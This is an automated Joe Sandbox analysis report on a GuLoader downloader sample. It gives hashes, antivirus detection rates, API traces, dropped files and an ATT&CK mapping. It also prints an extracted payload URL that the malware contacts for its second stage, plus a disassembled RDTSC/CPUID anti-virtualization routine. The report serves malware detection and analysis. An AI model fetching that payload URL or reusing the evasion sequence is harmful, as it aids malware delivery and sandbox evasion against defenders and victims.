Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
9u4xTDR5bG

Overview

General Information

Sample Name:9u4xTDR5bG (renamed file extension from none to exe)
Analysis ID:561346
MD5:82c5cdde9df0a76e2933c1cd8bfc7887
SHA1:7b391b4429dfbf19030fb49ce750aa3c8b844a6b
SHA256:243ae30d42e90000b882779fae40e0056eab332b95e2c938446138a80868909e
Tags:32exesignedtrojan
Infos:

Detection

GuLoader
Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Tries to detect virtualization through RDTSC time measurements
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Drops PE files
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
PE / OLE file has an invalid certificate
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality for execution timing, often used to detect debuggers
Abnormal high CPU Usage
Contains functionality for read data from the clipboard

Classification

  • System is w10x64
  • 9u4xTDR5bG.exe (PID: 3224 cmdline: "C:\Users\user\Desktop\9u4xTDR5bG.exe" MD5: 82C5CDDE9DF0A76E2933C1CD8BFC7887)
  • cleanup
{"Payload URL": "https://bangladeshshoecity.com/images/2w"}
SourceRuleDescriptionAuthorStrings
00000000.00000002.764364094.0000000002A50000.00000040.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    No Sigma rule has matched

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: 00000000.00000002.764364094.0000000002A50000.00000040.00000800.00020000.00000000.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "https://bangladeshshoecity.com/images/2w"}
    Source: 9u4xTDR5bG.exeVirustotal: Detection: 31%Perma Link
    Source: 9u4xTDR5bG.exeReversingLabs: Detection: 44%
    Source: 9u4xTDR5bG.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
    Source: 9u4xTDR5bG.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
    Source: C:\Users\user\Desktop\9u4xTDR5bG.exeCode function: 0_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C49
    Source: C:\Users\user\Desktop\9u4xTDR5bG.exeCode function: 0_2_00406873 FindFirstFileW,FindClose,0_2_00406873
    Source: C:\Users\user\Desktop\9u4xTDR5bG.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B

    Networking

    barindex
    Source: Malware configuration extractorURLs: https://bangladeshshoecity.com/images/2w
    Source: 9u4xTDR5bG.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
    Source: 9u4xTDR5bG.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
    Source: 9u4xTDR5bG.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
    Source: 9u4xTDR5bG.exeString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
    Source: 9u4xTDR5bG.exeString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
    Source: 9u4xTDR5bG.exeString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
    Source: 9u4xTDR5bG.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
    Source: 9u4xTDR5bG.exeString found in binary or memory: http://ocsp.digicert.com0C
    Source: 9u4xTDR5bG.exeString found in binary or memory: http://ocsp.digicert.com0O
    Source: 9u4xTDR5bG.exeString found in binary or memory: http://www.digicert.com/CPS0
    Source: 9u4xTDR5bG.exeString found in binary or memory: https://www.digicert.com/CPS0
    Source: C:\Users\user\Desktop\9u4xTDR5bG.exeCode function: 0_2_004056DE GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004056DE
    Source: 9u4xTDR5bG.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
    Source: C:\Users\user\Desktop\9u4xTDR5bG.exeCode function: 0_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040352D
    Source: C:\Users\user\Desktop\9u4xTDR5bG.exeCode function: 0_2_0040755C0_2_0040755C
    Source: C:\Users\user\Desktop\9u4xTDR5bG.exeCode function: 0_2_00406D850_2_00406D85
    Source: C:\Users\user\Desktop\9u4xTDR5bG.exeCode function: 0_2_73201BFF0_2_73201BFF
    Source: C:\Users\user\Desktop\9u4xTDR5bG.exeCode function: 0_2_02A556940_2_02A55694
    Source: C:\Users\user\Desktop\9u4xTDR5bG.exeCode function: 0_2_02A53CAF0_2_02A53CAF
    Source: C:\Users\user\Desktop\9u4xTDR5bG.exeCode function: 0_2_02A54EDA0_2_02A54EDA
    Source: C:\Users\user\Desktop\9u4xTDR5bG.exeCode function: 0_2_02A578390_2_02A57839
    Source: C:\Users\user\Desktop\9u4xTDR5bG.exeCode function: 0_2_02A5521F0_2_02A5521F
    Source: C:\Users\user\Desktop\9u4xTDR5bG.exeCode function: 0_2_02A576580_2_02A57658
    Source: C:\Users\user\Desktop\9u4xTDR5bG.exeCode function: 0_2_02A559820_2_02A55982
    Source: C:\Users\user\Desktop\9u4xTDR5bG.exeCode function: 0_2_02A53B8F0_2_02A53B8F
    Source: C:\Users\user\Desktop\9u4xTDR5bG.exeCode function: 0_2_02A5279C0_2_02A5279C
    Source: C:\Users\user\Desktop\9u4xTDR5bG.exeCode function: 0_2_02A53FE20_2_02A53FE2
    Source: C:\Users\user\Desktop\9u4xTDR5bG.exeCode function: 0_2_02A575640_2_02A57564
    Source: C:\Users\user\Desktop\9u4xTDR5bG.exeCode function: 0_2_02A527490_2_02A52749
    Source: 9u4xTDR5bG.exeStatic PE information: invalid certificate
    Source: C:\Users\user\Desktop\9u4xTDR5bG.exeCode function: 0_2_02A55694 NtAllocateVirtualMemory,0_2_02A55694
    Source: C:\Users\user\Desktop\9u4xTDR5bG.exeProcess Stats: CPU usage > 98%
    Source: 9u4xTDR5bG.exeVirustotal: Detection: 31%
    Source: 9u4xTDR5bG.exeReversingLabs: Detection: 44%
    Source: C:\Users\user\Desktop\9u4xTDR5bG.exeFile read: C:\Users\user\Desktop\9u4xTDR5bG.exeJump to behavior
    Source: 9u4xTDR5bG.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\9u4xTDR5bG.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: C:\Users\user\Desktop\9u4xTDR5bG.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
    Source: C:\Users\user\Desktop\9u4xTDR5bG.exeCode function: 0_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040352D
    Source: C:\Users\user\Desktop\9u4xTDR5bG.exeFile created: C:\Users\user\AppData\Local\Temp\nsl4A9B.tmpJump to behavior
    Source: classification engineClassification label: mal72.troj.evad.winEXE@1/3@0/0
    Source: C:\Users\user\Desktop\9u4xTDR5bG.exeCode function: 0_2_004021AA CoCreateInstance,0_2_004021AA
    Source: C:\Users\user\Desktop\9u4xTDR5bG.exeFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Users\user\Desktop\9u4xTDR5bG.exeCode function: 0_2_0040498A GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_0040498A
    Source: 9u4xTDR5bG.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

    Data Obfuscation

    barindex
    Source: Yara matchFile source: 00000000.00000002.764364094.0000000002A50000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
    Source: C:\Users\user\Desktop\9u4xTDR5bG.exeCode function: 0_2_732030C0 push eax; ret 0_2_732030EE
    Source: C:\Users\user\Desktop\9u4xTDR5bG.exeCode function: 0_2_73201BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_73201BFF
    Source: C:\Users\user\Desktop\9u4xTDR5bG.exeFile created: C:\Users\user\AppData\Local\Temp\nsm4CBF.tmp\System.dllJump to dropped file
    Source: C:\Users\user\Desktop\9u4xTDR5bG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

    Malware Analysis System Evasion

    barindex
    Source: C:\Users\user\Desktop\9u4xTDR5bG.exeRDTSC instruction interceptor: First address: 0000000002A551C3 second address: 0000000002A551C3 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 42A4596Fh 0x00000007 sub eax, FBADDA8Dh 0x0000000c xor eax, 87ED79C8h 0x00000011 xor eax, C11B072Bh 0x00000016 cpuid 0x00000018 popad 0x00000019 call 00007F151CAE4FDEh 0x0000001e lfence 0x00000021 mov edx, B78E5550h 0x00000026 xor edx, 614933DAh 0x0000002c add edx, 0CEF4ABFh 0x00000032 xor edx, 9C48B15Dh 0x00000038 mov edx, dword ptr [edx] 0x0000003a lfence 0x0000003d ret 0x0000003e test dx, bx 0x00000041 sub edx, esi 0x00000043 ret 0x00000044 pop ecx 0x00000045 cmp ch, 0000007Eh 0x00000048 add edi, edx 0x0000004a dec ecx 0x0000004b mov dword ptr [ebp+00000227h], 169B01A4h 0x00000055 xor dword ptr [ebp+00000227h], BF933C27h 0x0000005f fnop 0x00000061 sub dword ptr [ebp+00000227h], B3AFC749h 0x0000006b xor dword ptr [ebp+00000227h], F558763Ah 0x00000075 cmp ecx, dword ptr [ebp+00000227h] 0x0000007b jne 00007F151CAE4F85h 0x0000007d mov dword ptr [ebp+0000024Ch], esi 0x00000083 mov esi, ecx 0x00000085 push esi 0x00000086 mov esi, dword ptr [ebp+0000024Ch] 0x0000008c call 00007F151CAE503Fh 0x00000091 call 00007F151CAE4FFFh 0x00000096 lfence 0x00000099 mov edx, B78E5550h 0x0000009e xor edx, 614933DAh 0x000000a4 add edx, 0CEF4ABFh 0x000000aa xor edx, 9C48B15Dh 0x000000b0 mov edx, dword ptr [edx] 0x000000b2 lfence 0x000000b5 ret 0x000000b6 mov esi, edx 0x000000b8 pushad 0x000000b9 rdtsc
    Source: C:\Users\user\Desktop\9u4xTDR5bG.exeCode function: 0_2_02A5542A rdtsc 0_2_02A5542A
    Source: C:\Users\user\Desktop\9u4xTDR5bG.exeCode function: 0_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C49
    Source: C:\Users\user\Desktop\9u4xTDR5bG.exeCode function: 0_2_00406873 FindFirstFileW,FindClose,0_2_00406873
    Source: C:\Users\user\Desktop\9u4xTDR5bG.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B
    Source: C:\Users\user\Desktop\9u4xTDR5bG.exeAPI call chain: ExitProcess graph end nodegraph_0-5763
    Source: C:\Users\user\Desktop\9u4xTDR5bG.exeAPI call chain: ExitProcess graph end nodegraph_0-5919
    Source: C:\Users\user\Desktop\9u4xTDR5bG.exeCode function: 0_2_02A550A9 mov eax, dword ptr fs:[00000030h]0_2_02A550A9
    Source: C:\Users\user\Desktop\9u4xTDR5bG.exeCode function: 0_2_02A56CD9 mov eax, dword ptr fs:[00000030h]0_2_02A56CD9
    Source: C:\Users\user\Desktop\9u4xTDR5bG.exeCode function: 0_2_02A56A06 mov eax, dword ptr fs:[00000030h]0_2_02A56A06
    Source: C:\Users\user\Desktop\9u4xTDR5bG.exeCode function: 0_2_02A537EC mov eax, dword ptr fs:[00000030h]0_2_02A537EC
    Source: C:\Users\user\Desktop\9u4xTDR5bG.exeCode function: 0_2_02A57564 mov eax, dword ptr fs:[00000030h]0_2_02A57564
    Source: C:\Users\user\Desktop\9u4xTDR5bG.exeCode function: 0_2_73201BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_73201BFF
    Source: C:\Users\user\Desktop\9u4xTDR5bG.exeCode function: 0_2_02A5542A rdtsc 0_2_02A5542A
    Source: C:\Users\user\Desktop\9u4xTDR5bG.exeCode function: 0_2_02A58130 RtlAddVectoredExceptionHandler,0_2_02A58130
    Source: C:\Users\user\Desktop\9u4xTDR5bG.exeCode function: 0_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040352D
    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid Accounts1
    Native API
    Path Interception1
    Access Token Manipulation
    1
    Access Token Manipulation
    OS Credential Dumping11
    Security Software Discovery
    Remote Services1
    Archive Collected Data
    Exfiltration Over Other Network Medium1
    Encrypted Channel
    Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
    System Shutdown/Reboot
    Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
    Obfuscated Files or Information
    LSASS Memory2
    File and Directory Discovery
    Remote Desktop Protocol1
    Clipboard Data
    Exfiltration Over Bluetooth1
    Application Layer Protocol
    Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account Manager13
    System Information Discovery
    SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    9u4xTDR5bG.exe31%VirustotalBrowse
    9u4xTDR5bG.exe11%MetadefenderBrowse
    9u4xTDR5bG.exe44%ReversingLabsWin32.Downloader.GuLoader
    SourceDetectionScannerLabelLink
    C:\Users\user\AppData\Local\Temp\Bosporus5.dat2%ReversingLabs
    C:\Users\user\AppData\Local\Temp\nsm4CBF.tmp\System.dll0%MetadefenderBrowse
    C:\Users\user\AppData\Local\Temp\nsm4CBF.tmp\System.dll0%ReversingLabs
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    https://bangladeshshoecity.com/images/2w0%Avira URL Cloudsafe
    No contacted domains info
    NameMaliciousAntivirus DetectionReputation
    https://bangladeshshoecity.com/images/2wtrue
    • Avira URL Cloud: safe
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    http://nsis.sf.net/NSIS_ErrorError9u4xTDR5bG.exefalse
      high
      No contacted IP infos
      Joe Sandbox Version:34.0.0 Boulder Opal
      Analysis ID:561346
      Start date:27.01.2022
      Start time:11:27:47
      Joe Sandbox Product:CloudBasic
      Overall analysis duration:0h 8m 22s
      Hypervisor based Inspection enabled:false
      Report type:full
      Sample file name:9u4xTDR5bG (renamed file extension from none to exe)
      Cookbook file name:default.jbs
      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
      Number of analysed new started processes analysed:25
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • HDC enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Detection:MAL
      Classification:mal72.troj.evad.winEXE@1/3@0/0
      EGA Information:
      • Successful, ratio: 100%
      HDC Information:
      • Successful, ratio: 40.2% (good quality ratio 39.6%)
      • Quality average: 86.9%
      • Quality standard deviation: 21.2%
      HCA Information:
      • Successful, ratio: 100%
      • Number of executed functions: 33
      • Number of non-executed functions: 52
      Cookbook Comments:
      • Adjust boot time
      • Enable AMSI
      • Override analysis time to 240s for sample files taking high CPU consumption
      • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
      • Excluded domains from analysis (whitelisted): www.bing.com, ris.api.iris.microsoft.com, client.wns.windows.com, fs.microsoft.com, store-images.s-microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
      • Not all processes where analyzed, report is missing behavior information
      No simulations
      No context
      No context
      No context
      No context
      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
      C:\Users\user\AppData\Local\Temp\nsm4CBF.tmp\System.dlllUkTchBi9r.rtfGet hashmaliciousBrowse
        A3hamzfUkW.rtfGet hashmaliciousBrowse
          7027521.xlsxGet hashmaliciousBrowse
            SdEkI4IDqd.exeGet hashmaliciousBrowse
              SdEkI4IDqd.exeGet hashmaliciousBrowse
                cP5nXH8fQI.exeGet hashmaliciousBrowse
                  cP5nXH8fQI.exeGet hashmaliciousBrowse
                    BL Copy.docGet hashmaliciousBrowse
                      jqkuxbwi.exeGet hashmaliciousBrowse
                        HealthSystray.exeGet hashmaliciousBrowse
                          jqkuxbwi.exeGet hashmaliciousBrowse
                            listing new.xlsxGet hashmaliciousBrowse
                              Pnportd65.exeGet hashmaliciousBrowse
                                Pnportd65.exeGet hashmaliciousBrowse
                                  PO-C - 20211213-PLATE.docGet hashmaliciousBrowse
                                    new.xlsxGet hashmaliciousBrowse
                                      8#Ub2e4).exeGet hashmaliciousBrowse
                                        eW8Jsngljx.exeGet hashmaliciousBrowse
                                          o4XzTr73Ut.exeGet hashmaliciousBrowse
                                            uDZovIdfEJ.exeGet hashmaliciousBrowse
                                              C:\Users\user\AppData\Local\Temp\Bosporus5.datlUkTchBi9r.rtfGet hashmaliciousBrowse
                                                Process:C:\Users\user\Desktop\9u4xTDR5bG.exe
                                                File Type:DOS executable (COM)
                                                Category:dropped
                                                Size (bytes):33702
                                                Entropy (8bit):7.640543622166051
                                                Encrypted:false
                                                SSDEEP:768:1FwMrbBlFp7y+OzxSaYStTVsui/XXjqC4iYBnDyvfWjbvx0K:nwMrbnFp7y1wJSJVsPGChMevOF
                                                MD5:2C2658C12C970777B7D352045683823D
                                                SHA1:6EEDC661A65C91EBF2F0CB013ED683CFD704757E
                                                SHA-256:2514D174967C285492114476DC13AAABBBD4248A756770BDD2B60117EE347752
                                                SHA-512:C6778168D222A85C58B7FE38AD81E96413D05DA70603130B74454ACB9A2CA759E8707F71CAEFD1DC16ECF8F4F419A9C4171814D346297280DF78DB0786F86677
                                                Malicious:false
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 2%
                                                Joe Sandbox View:
                                                • Filename: lUkTchBi9r.rtf, Detection: malicious, Browse
                                                Reputation:low
                                                Preview:.__.?.u.....u.....u..........o....It....s..svu.....3.....B]..*...W..o...Z1..4..u.N....9.u.W........N..U.-.t .....2D.B.h....R..D..b..K7$"jX[,...1...a........^W.....oz.'.Ut.'..7.Hg..G.....pY..3n.:.u..)..\.4.......ugUB...`..vw.@_iPr..v.5...8.l........F..W...8..k.)...M.c.P.........O...!b....!G.A.......m.......]S5.....JI.s8<K.w..<G...g.<......7}...<..M....5.&.....,........!A...N..\.{.X...P.....bt.N.u.N..>..u.NH.....V.j....w.N........0.Lu....N.....|X.j.....A.g.w.H.iFwX..vo...T./u..!.N.0...L..cic.Ev/.(..N..P....R..#.@.-).u.w..\..u..._..u..9.N.......L.u.O...N.u1.Pu.jQ._....ZQ.5>o}..cX:.}..2SX".}.....!6..I.?.B.r.'.N..- .AX..........X...\....`L...t.e...~....'.N.."\.G....!r^.w...Xz.w.r...j..i..A.......t....2.5.I.1~.F..d ..4..XJ..]Z0..k)p........Xz.Qv.J..j.$D..N..u&.....kO.ub..YW..qlj...Z.(.:I}...ZZ..2.k0...p...&R.t.N.<......v.P..|&d..Fz..@......SOF&..6...%..`7yDP......O.u`G.........(..}...5...$R..t.NF#U...\0,u...J.5...z........l.z.[Fc"TZe...'*%R.Pw
                                                Process:C:\Users\user\Desktop\9u4xTDR5bG.exe
                                                File Type:ASCII text, with very long lines, with no line terminators
                                                Category:dropped
                                                Size (bytes):16555
                                                Entropy (8bit):5.9518641421213605
                                                Encrypted:false
                                                SSDEEP:384:HpBOk6soHG6Nun3UPBApXPE8eMag91API7ee872UmLZ7:HmkfOG6NNyp/dn19N7U71mLZ
                                                MD5:695A2030432B3D981B012A42EDCA055A
                                                SHA1:31283CF8F970E22E7C9B6FCB811B9C1608997211
                                                SHA-256:F0568B8400FE6F4621B3E62C56B3C3AB9712DD6D30966A348EB3497ACF6B226A
                                                SHA-512:0095FE21135FCCB9C5723D583C2087FB9D9CD61CB90BB5C96E11EA76469A3744B7F068B7301F7342AF95642D18921763B250FBB9E8F16F5CC9124300E6A97C5C
                                                Malicious:false
                                                Reputation:low
                                                Preview:EMr8t0Hhq715RQjpV8l9LooUdWJgMtMf2pE83U2wsss81G5KJFLeIXMa1T93HGjNEbFfy4IRaWjctEH1I3hWG74wsJYdZXNmLTqTenvgec8qpu98Zp4XlrrAhbuVePBg5nxMeoxIojglOuJAvAZef0Nak7gm0ix8xSE70QeFJMFjJvEAWRFFFtZOYkcHhCgewp7YBE8OekOsOrcexafRG4AdZaWBz3yCE4qMP0NAcxJ4DHeCdzbc6hW8i8otpHEpw0OGDSzOwMl9VCfHuXXhaw0zVcWRcWKg1sABn5d7OrJ2xhlYvPjqrY5w7z8FN0FgE8XtOgiSbRGN0toQLHc2vjrb52VFWESFWMUHsKSZfQ4PbqkilIzeyLOvDdo44fuucajegzqku9brw7f8p9R2zFXqooBphSkPzHY6XmnyhU3WyDWzX4CroF6xRQXhjjk7OqKFaLu4ORq54CnRXdGfPhd7dzPgYFxqUkZaqo2ckBxUeh3QLr4p1ievUUewtab3AdAT2kjQDq4NVPoAQ5jJvQkApXm49qXhPrvrU2YzKVhY5ajHSj55DsIeOSI066y24ayag5YtldIsnpkasB3iqzZiXwJJSOwZVHVJGChfSumllKT835iwi6k9utWFP5wIpTCqM6CflHh1JSg5HTMqV8fq5VseXa9XzYpdeJu9OBtsanwwES7WtQoLDnmScaoIfCjrIqw61PPDM8QEGM14KrtcVF5ERKQSh6jPyKwNObsN9Ts4FbeSzqr0KnDMekc8p8tRrSRckLbRBa58jfVkjWjcQeuGU8J8gr9f2EG5bdrGEds4pfOwG1TGJcUCr6T8jH9Q82m4wdSeL3wJDr5HYJN0ESkrvn77s4vH90F55tPEmd6ZjNInCzW2BOZfhfO10qNfHa7ZhuyiWVIf05P6uzThDVcRpFtIjVTvGctBTjxS6LEiUlof2CsVigpyEGuXekSTdPsflqGf5sMzKcxKlDJc6mtYp7gIqQODeycT
                                                Process:C:\Users\user\Desktop\9u4xTDR5bG.exe
                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):12288
                                                Entropy (8bit):5.814115788739565
                                                Encrypted:false
                                                SSDEEP:192:Zjvco0qWTlt70m5Aj/lQ0sEWD/wtYbBHFNaDybC7y+XBz0QPi:FHQlt70mij/lQRv/9VMjzr
                                                MD5:CFF85C549D536F651D4FB8387F1976F2
                                                SHA1:D41CE3A5FF609DF9CF5C7E207D3B59BF8A48530E
                                                SHA-256:8DC562CDA7217A3A52DB898243DE3E2ED68B80E62DDCB8619545ED0B4E7F65A8
                                                SHA-512:531D6328DAF3B86D85556016D299798FA06FEFC81604185108A342D000E203094C8C12226A12BD6E1F89B0DB501FB66F827B610D460B933BD4AB936AC2FD8A88
                                                Malicious:false
                                                Antivirus:
                                                • Antivirus: Metadefender, Detection: 0%, Browse
                                                • Antivirus: ReversingLabs, Detection: 0%
                                                Joe Sandbox View:
                                                • Filename: lUkTchBi9r.rtf, Detection: malicious, Browse
                                                • Filename: A3hamzfUkW.rtf, Detection: malicious, Browse
                                                • Filename: 7027521.xlsx, Detection: malicious, Browse
                                                • Filename: SdEkI4IDqd.exe, Detection: malicious, Browse
                                                • Filename: SdEkI4IDqd.exe, Detection: malicious, Browse
                                                • Filename: cP5nXH8fQI.exe, Detection: malicious, Browse
                                                • Filename: cP5nXH8fQI.exe, Detection: malicious, Browse
                                                • Filename: BL Copy.doc, Detection: malicious, Browse
                                                • Filename: jqkuxbwi.exe, Detection: malicious, Browse
                                                • Filename: HealthSystray.exe, Detection: malicious, Browse
                                                • Filename: jqkuxbwi.exe, Detection: malicious, Browse
                                                • Filename: listing new.xlsx, Detection: malicious, Browse
                                                • Filename: Pnportd65.exe, Detection: malicious, Browse
                                                • Filename: Pnportd65.exe, Detection: malicious, Browse
                                                • Filename: PO-C - 20211213-PLATE.doc, Detection: malicious, Browse
                                                • Filename: new.xlsx, Detection: malicious, Browse
                                                • Filename: 8#Ub2e4).exe, Detection: malicious, Browse
                                                • Filename: eW8Jsngljx.exe, Detection: malicious, Browse
                                                • Filename: o4XzTr73Ut.exe, Detection: malicious, Browse
                                                • Filename: uDZovIdfEJ.exe, Detection: malicious, Browse
                                                Reputation:moderate, very likely benign file
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....Oa...........!....."...........*.......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                Entropy (8bit):7.524133406272662
                                                TrID:
                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                • DOS Executable Generic (2002/1) 0.02%
                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                File name:9u4xTDR5bG.exe
                                                File size:95632
                                                MD5:82c5cdde9df0a76e2933c1cd8bfc7887
                                                SHA1:7b391b4429dfbf19030fb49ce750aa3c8b844a6b
                                                SHA256:243ae30d42e90000b882779fae40e0056eab332b95e2c938446138a80868909e
                                                SHA512:ee64b01a269422e45a458d9e77151435ecfbdeb96b2c7d80e961f3e4cfbacb9626f2df1cb32790dfa174aa2d517868abd4fd8a9fbed3c5b8feac3dae0a790c7e
